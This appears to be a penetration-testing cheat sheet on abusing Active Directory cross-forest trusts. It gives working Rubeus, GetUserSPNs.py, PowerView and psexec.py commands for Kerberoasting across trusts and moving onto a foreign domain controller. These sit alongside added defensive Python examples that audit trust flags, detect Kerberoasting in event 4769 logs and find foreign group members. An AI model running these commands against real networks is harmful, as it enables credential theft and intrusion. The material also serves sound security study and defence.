Cross-Forest Trust Abuse
Windows
Cross-Forest Kerberoasting
Cross-Forest Kerberoasting is an attack that exploits Kerberos authentication across Active Directory forest trusts. An attacker first enumerates Service Principal Names (SPNs) in the trusted forest using tools like GetUserSPNs.py. Once SPNs are identified, the attacker requests Kerberos Ticket Granting Service (TGS) tickets for these accounts. Because a TGS ticket is encrypted with a key derived from the service account's password (for RC4 tickets, the account's NTLM hash), it can be extracted and cracked offline using tools like Hashcat to recover the plaintext credential. This attack is particularly dangerous because it allows privilege escalation across forest boundaries without requiring direct domain admin access.
We can perform both Kerberoasting and ASREPRoasting in a cross-forest environment if the trust direction is bidirectional.
Enumerating
```powershell
## [PowerView]
## Enumerate accounts that have an SPN set using Get-DomainUser
Get-DomainUser -SPN -Domain ANOTHERCOMPANY.LOCAL | select SamAccountName
## The command above lists kerberoastable accounts; look at one of them more closely
Get-DomainUser -Domain ANOTHERCOMPANY.LOCAL -Identity babitaji | select samaccountname,memberof
```
Kerberoasting Across Trust
Rubeus
```powershell
.\Rubeus.exe kerberoast /domain:ANOTHERCOMPANY.LOCAL /user:babitaji /nowrap
## Crack the resulting hash with hashcat.
```
Admin Password Re-Use & Group Membership
In a bidirectional forest trust, admins often manage both domains, leading to potential password reuse. If we compromise Domain A and obtain credentials for a privileged user, the same credentials might work in Domain B. Additionally, admins from Domain A may have group memberships in Domain B, granting them elevated privileges. Taking over such an admin in Domain A could provide full administrative access to Domain B.
```powershell
## Enumerate groups that contain members from a foreign domain
Get-DomainForeignGroupMember -Domain ANOTHERCOMPANY.LOCAL
## Convert the 'MemberName' SID from the output above to a readable name
Convert-SidToName <MEMBER-NAME>
```
PSSession Connection
```powershell
## Verify access
Enter-PSSession -ComputerName DC03.ANOTHERCOMPANY.LOCAL -Credential REZYDEV\administrator
```
SID History Abuse
SID History can be exploited in a forest trust if SID Filtering is not enabled. When a user is migrated from rezydev.local to anothercompany.local, their old SID can be carried over. If an admin SID from rezydev.local is added to their SID history, they will retain admin privileges in rezydev.local even after moving to anothercompany.local. This allows them to access resources in the old domain while being a member of the new one.
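Both the bidirectional-trust point above and the SID filtering caveat come down to two attributes on each trustedDomain object, trustDirection and trustAttributes. The following added example (not code from the original page, PowerView or BloodHound) audits constructed trust records for direction, trust type and whether SID filtering is effectively on. The flag values are the MS-ADTS ones; the SID-filtering rule is a simplified model of the one BloodHound applies: a forest trust filters SIDs unless TREAT_AS_EXTERNAL relaxes it (what `netdom trust ... /enablesidhistory:yes` sets), and an external trust filters only when QUARANTINED_DOMAIN is set. The trust names and attribute combinations are constructed.

```python
"""Audit Active Directory trust objects for direction and effective SID filtering.

Added example; the records are constructed stand-ins for the trustDirection and
trustAttributes values read from trustedDomain objects under CN=System.
"""
TRUST_DIRECTION = {
    0: "disabled",
    1: "inbound",        # the other domain trusts this one
    2: "outbound",       # this domain trusts the other
    3: "bidirectional",
}
# trustAttributes bit flags (MS-ADTS)
NON_TRANSITIVE = 0x01
UPLEVEL_ONLY = 0x02
QUARANTINED_DOMAIN = 0x04    # SID filter quarantining on an external trust
FOREST_TRANSITIVE = 0x08     # forest trust
CROSS_ORGANIZATION = 0x10    # selective authentication
WITHIN_FOREST = 0x20         # parent/child or tree-root trust inside one forest
TREAT_AS_EXTERNAL = 0x40     # forest trust relaxed to external-trust SID filtering
USES_RC4_ENCRYPTION = 0x80


def trust_type(attrs):
    if attrs & WITHIN_FOREST:
        return "intra-forest"
    if attrs & FOREST_TRANSITIVE:
        return "forest"
    return "external"


def sid_filtering_enabled(attrs):
    """Simplified model (assumption) of whether SIDs from the other side are filtered."""
    kind = trust_type(attrs)
    if kind == "intra-forest":
        return False            # SID filtering does not apply inside a forest
    if kind == "forest":
        return not attrs & TREAT_AS_EXTERNAL
    return bool(attrs & QUARANTINED_DOMAIN)


def audit_trust(record):
    """Return a finding dict for one trustedDomain record."""
    attrs = record["trustAttributes"]
    kind = trust_type(attrs)
    direction = TRUST_DIRECTION.get(record["trustDirection"], "unknown")
    filtered = sid_filtering_enabled(attrs)
    risks = []
    if kind != "intra-forest" and not filtered:
        risks.append("SID history from the trusted side is honoured (SID filtering off)")
    if kind != "intra-forest" and direction == "bidirectional":
        risks.append("bidirectional: accounts on either side can request service tickets on the other")
    if attrs & USES_RC4_ENCRYPTION:
        risks.append("trust keys use RC4")
    if kind == "forest" and not attrs & CROSS_ORGANIZATION:
        risks.append("forest-wide authentication (selective authentication not set)")
    return {"name": record["name"], "type": kind, "direction": direction,
            "sid_filtering": filtered, "risks": risks}


def audit_all(records):
    return [audit_trust(r) for r in records]


# Constructed trust records, not real directory data
CONSTRUCTED_TRUSTS = [
    {"name": "ANOTHERCOMPANY.LOCAL", "trustDirection": 3,
     "trustAttributes": FOREST_TRANSITIVE | TREAT_AS_EXTERNAL},
    {"name": "partner.example", "trustDirection": 2,
     "trustAttributes": QUARANTINED_DOMAIN},
    {"name": "child.rezydev.local", "trustDirection": 3,
     "trustAttributes": WITHIN_FOREST},
]

if __name__ == "__main__":
    for finding in audit_all(CONSTRUCTED_TRUSTS):
        print(f"{finding['name']}: {finding['type']}, {finding['direction']}, "
              f"SID filtering={'on' if finding['sid_filtering'] else 'OFF'}")
        for risk in finding["risks"]:
            print(f"  - {risk}")
```

In a real audit the three attributes come from an LDAP query of the trustedDomain objects (or from Get-DomainTrust, which decodes the same flags); the model above is deliberately simplified and should be read alongside the MS-ADTS and MS-PAC descriptions of SID filtering before any change is made to a production trust.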
Linux
Kerberoasting
```bash
## GetUserSPNs.py
python3 /path/to/GetUserSPNs.py -request -target-domain ANOTHERCOMPANY.LOCAL REZYDEV.LOCAL/jethalal
## Note: in the command above, ANOTHERCOMPANY.LOCAL is the target forest being abused, and
## we hold credentials for the user jethalal in the REZYDEV.LOCAL domain.
```
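Whether the tickets are requested with Rubeus (Windows section above) or GetUserSPNs.py (here), the target forest's domain controller logs each request as Security event 4769. The following added example (not code from the original page, Rubeus or Impacket) runs a simple Kerberoasting heuristic over constructed 4769 records: one account requesting RC4 (0x17) service tickets for several distinct service accounts within a short window, with the requester's UPN suffix used to tell cross-forest requests from local ones. Field names, sample accounts, addresses and the choice to ignore computer-account (`$`) and krbtgt service names are assumptions made for the example.

```python
"""Detect Kerberoasting-style TGS requests in Windows Security event 4769 data.

Added example; the records below are constructed to mimic the 4769 fields a
SIEM extracts: TargetUserName (the account that asked for the ticket),
ServiceName (the SPN owner), TicketEncryptionType and IpAddress.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17          # etype kerberoasting tools ask for; the key is the NT hash
AES256_CTS = 0x12        # what a normal Windows client negotiates
THRESHOLD = 3            # distinct service accounts within WINDOW before alerting
WINDOW = timedelta(minutes=5)

# Constructed event records: (timestamp, TargetUserName, ServiceName, etype, IpAddress)
CONSTRUCTED_EVENTS = [
    ("2024-05-01T10:00:01", "jethalal@REZYDEV.LOCAL", "svc_sql", RC4_HMAC, "10.10.10.20"),
    ("2024-05-01T10:00:02", "jethalal@REZYDEV.LOCAL", "svc_web", RC4_HMAC, "10.10.10.20"),
    ("2024-05-01T10:00:02", "jethalal@REZYDEV.LOCAL", "DC03$", RC4_HMAC, "10.10.10.20"),
    ("2024-05-01T10:00:04", "jethalal@REZYDEV.LOCAL", "svc_backup", RC4_HMAC, "10.10.10.20"),
    ("2024-05-01T10:01:00", "babitaji@ANOTHERCOMPANY.LOCAL", "svc_sql", AES256_CTS, "10.10.20.7"),
    ("2024-05-01T10:02:00", "babitaji@ANOTHERCOMPANY.LOCAL", "svc_web", AES256_CTS, "10.10.20.7"),
    ("2024-05-01T10:03:00", "babitaji@ANOTHERCOMPANY.LOCAL", "svc_backup", AES256_CTS, "10.10.20.7"),
    ("2024-05-01T11:30:00", "priya@ANOTHERCOMPANY.LOCAL", "svc_sql", RC4_HMAC, "10.10.20.9"),
    ("2024-05-01T11:45:00", "priya@ANOTHERCOMPANY.LOCAL", "svc_web", RC4_HMAC, "10.10.20.9"),
]


def parse_time(stamp):
    return datetime.fromisoformat(stamp)


def detect_kerberoasting(events, local_domain, threshold=THRESHOLD, window=WINDOW):
    """Return one alert per requesting account that obtained RC4 service tickets
    for at least `threshold` distinct service accounts inside `window`.

    `local_domain` is the domain whose DC produced the events; a requester whose
    UPN suffix differs came in across a trust and is marked cross_forest.
    """
    per_account = defaultdict(list)
    for stamp, requester, service, etype, ip in events:
        # Only RC4 tickets are crackable offline in practice; computer accounts
        # and the krbtgt referral ticket are not kerberoasting targets (assumption).
        if etype != RC4_HMAC or service.endswith("$") or service.lower() == "krbtgt":
            continue
        per_account[requester].append((parse_time(stamp), service, ip))

    alerts = []
    for requester, reqs in per_account.items():
        reqs.sort()
        for t_end, _, _ in reqs:
            in_window = [r for r in reqs if t_end - window <= r[0] <= t_end]
            services = sorted({r[1] for r in in_window})
            if len(services) >= threshold:
                _, suffix = requester.rsplit("@", 1)
                alerts.append({
                    "account": requester,
                    "cross_forest": suffix.upper() != local_domain.upper(),
                    "services": services,
                    "sources": sorted({r[2] for r in in_window}),
                })
                break   # one alert per account is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(CONSTRUCTED_EVENTS, "ANOTHERCOMPANY.LOCAL"):
        scope = "cross-forest" if alert["cross_forest"] else "local"
        print(f"{alert['account']} ({scope}) requested RC4 tickets for "
              f"{', '.join(alert['services'])} from {', '.join(alert['sources'])}")
```

The constructed data shows the three outcomes a defender cares about: the foreign account requesting RC4 tickets for three services in four seconds is flagged, the local account that negotiates AES for the same services is not, and two RC4 requests fifteen minutes apart stay below the threshold. On the mitigation side, the same signal disappears when service accounts have AES-only keys (or are gMSAs), which is why the etype field matters as much as the count.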
Foreign Group Membership
To hunt for foreign group memberships in an environment from a Linux attack host, we can use BloodHound-python to collect data and import the resulting .json file into BloodHound for enumeration. In cases involving a bidirectional forest trust relationship, a privileged user from Domain A may be a member of the Built-in Administrators group in Domain B, potentially granting elevated access across domains.
In the BloodHound GUI, run the pre-built query "Users with Foreign Domain Group Membership" under the Analysis tab.
Use psexec.py to authenticate to a DC located in the other forest:
```bash
psexec.py ANOTHERCOMPANY.LOCAL/babitaji@dc03.rezydev.local -target-ip 10.10.10.50
```
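The check behind Get-DomainForeignGroupMember (Windows section above) and BloodHound's "Users with Foreign Domain Group Membership" query is the same on both platforms: compare the domain part of each member's SID with the SID of the domain that owns the group. The following added example (not the page's code, nor PowerView's or BloodHound's) runs that check over a constructed group dump and flags foreign members of privileged groups, which is what a defender reviewing a bidirectional trust wants to see first. The domain SIDs, group names, member SIDs and the small SID-to-name table that stands in for Convert-SidToName are all constructed.

```python
"""Find foreign security principals in a domain's groups, defender's side.

Added example; the group dump is constructed. In a real audit each group's
objectSid and member list come from an LDAP query of the domain being reviewed.
"""
DOMAIN_SID_PREFIX = "S-1-5-21-"        # SIDs of domain accounts start with this
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}

# Constructed SIDs for the two forests in the page's scenario (not real values)
LOCAL_DOMAIN_SID = "S-1-5-21-1111-2222-3333"            # ANOTHERCOMPANY.LOCAL
KNOWN_DOMAINS = {
    LOCAL_DOMAIN_SID: "ANOTHERCOMPANY.LOCAL",
    "S-1-5-21-4444-5555-6666": "REZYDEV.LOCAL",
}
# Constructed SID->name table standing in for an LSA lookup (Convert-SidToName)
KNOWN_PRINCIPALS = {
    "S-1-5-21-4444-5555-6666-1105": "REZYDEV\\administrator",
}


def split_sid(sid):
    """'S-1-5-21-a-b-c-1105' -> ('S-1-5-21-a-b-c', 1105)."""
    domain, rid = sid.rsplit("-", 1)
    return domain, int(rid)


def is_privileged_group(group_sid, local_domain_sid):
    """BUILTIN\\Administrators or one of the well-known admin RIDs of this domain."""
    if group_sid == BUILTIN_ADMINISTRATORS:
        return True
    domain, rid = split_sid(group_sid)
    return domain == local_domain_sid and rid in PRIVILEGED_RIDS


def find_foreign_members(groups, local_domain_sid, known_domains, known_principals=None):
    """Return one finding per group member whose SID belongs to another domain."""
    known_principals = known_principals or {}
    findings = []
    for group in groups:
        for member_sid in group["members"]:
            if not member_sid.startswith(DOMAIN_SID_PREFIX):
                continue        # BUILTIN / well-known SID, not a domain account
            member_domain, _ = split_sid(member_sid)
            if member_domain == local_domain_sid:
                continue
            findings.append({
                "group": group["name"],
                "member_sid": member_sid,
                "member_name": known_principals.get(member_sid, "<unresolved>"),
                "member_domain": known_domains.get(member_domain, "<unknown forest>"),
                "privileged_group": is_privileged_group(group["sid"], local_domain_sid),
            })
    return findings


# Constructed group dump for ANOTHERCOMPANY.LOCAL
CONSTRUCTED_GROUPS = [
    {"name": "Administrators", "sid": BUILTIN_ADMINISTRATORS,
     "members": ["S-1-5-21-1111-2222-3333-500", "S-1-5-21-4444-5555-6666-1105"]},
    {"name": "Domain Admins", "sid": LOCAL_DOMAIN_SID + "-512",
     "members": ["S-1-5-21-1111-2222-3333-500", "S-1-5-21-1111-2222-3333-1104"]},
    {"name": "HelpDesk", "sid": LOCAL_DOMAIN_SID + "-1200",
     "members": ["S-1-5-21-1111-2222-3333-1300", "S-1-5-11",
                 "S-1-5-21-4444-5555-6666-1106"]},
]

if __name__ == "__main__":
    for f in find_foreign_members(CONSTRUCTED_GROUPS, LOCAL_DOMAIN_SID,
                                  KNOWN_DOMAINS, KNOWN_PRINCIPALS):
        flag = "PRIVILEGED" if f["privileged_group"] else "standard"
        print(f"{f['group']} ({flag}): {f['member_name']} {f['member_sid']} "
              f"from {f['member_domain']}")
```

The first finding, a REZYDEV.LOCAL account sitting in the target domain's Administrators group, is exactly the password-reuse and group-membership exposure described above; a member whose domain SID is not in the known-domains table is reported as an unknown forest, which usually means a stale or undocumented trust worth its own review.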